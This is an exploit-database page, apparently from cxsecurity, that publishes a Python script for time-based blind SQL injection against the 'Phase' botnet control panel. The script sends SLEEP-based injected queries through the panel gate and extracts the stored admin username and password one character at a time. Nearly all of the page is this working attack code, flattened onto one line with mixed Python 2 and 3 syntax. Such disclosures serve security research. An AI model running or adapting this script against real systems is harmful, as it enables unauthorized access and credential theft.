Phase Botnet Blind SQL Injection

2020.05.13
Credit: Anonymous
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

import requests import time import sys wait_delay = 5 #Depending on connection delay and server speed, you may need to make this a larger number KnockString = 'g=a&w=a&b=a&d=a&p=a&m=a' #lol no integrity verification PostData = "" def rc4_crypt(data , key): S = list(range(256)) j = 0 out = [] for i in range(256): j = (j + S[i] + ord( key[i % len(key)] )) % 256 S[i] , S[j] = S[j] , S[i] i = j = 0 for char in data: i = ( i + 1 ) % 256 j = ( j + S[i] ) % 256 S[i] , S[j] = S[j] , S[i] out.append(chr(ord(char) ^ S[(S[i] + S[j]) % 256])) return ''.join(out) def brute_length(url, id): for i in range(0, 30): Injection = "\"', (IF(LENGTH((SELECT value FROM settings WHERE id='%d')) = %d, SLEEP(%d), 0)), 'a', 'a', 'a', 'a', 'a', 'a')-- -" % (id, i, wait_delay) ConnectUrl = url + '?i=' + Injection start = time.time() r = requests.post(ConnectUrl, data=PostData, headers='') end = time.time() if((end - start) >= wait_delay): return i return 0 def brute_char(url, position, id): sys.stdout.write(" ") sys.stdout.flush() for i in range(32, 127): Injection = "\"', (IF(SUBSTRING((SELECT value FROM settings WHERE id='%d'), %d, 1) = BINARY CHAR(%d), SLEEP(%d), 0)), 'a', 'a', 'a', 'a', 'a', 'a')-- -" % (id, position, i, wait_delay) ConnectUrl = url + '?i=' + Injection sys.stdout.write("\b%c" % chr(i)) sys.stdout.flush() start = time.time() r = requests.post(ConnectUrl, data=PostData, headers='') end = time.time() if((end - start) >= wait_delay): break def brute_panel(url): global KnockString, PostData PostData = 'aaaa' + rc4_crypt(KnockString, 'aaaa') print"Username: ",; sys.stdout.flush() ulen = brute_length(url, 1) for i in range(1, ulen+1): brute_char(url, i, 1) print"\nPassword: ", sys.stdout.flush() plen = brute_length(url, 2) for i in range(1, plen+1): brute_char(url, i, 2) print"" if(len(sys.argv) >= 2): brute_panel(sys.argv[1]) else: print("enter panel gate url")


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top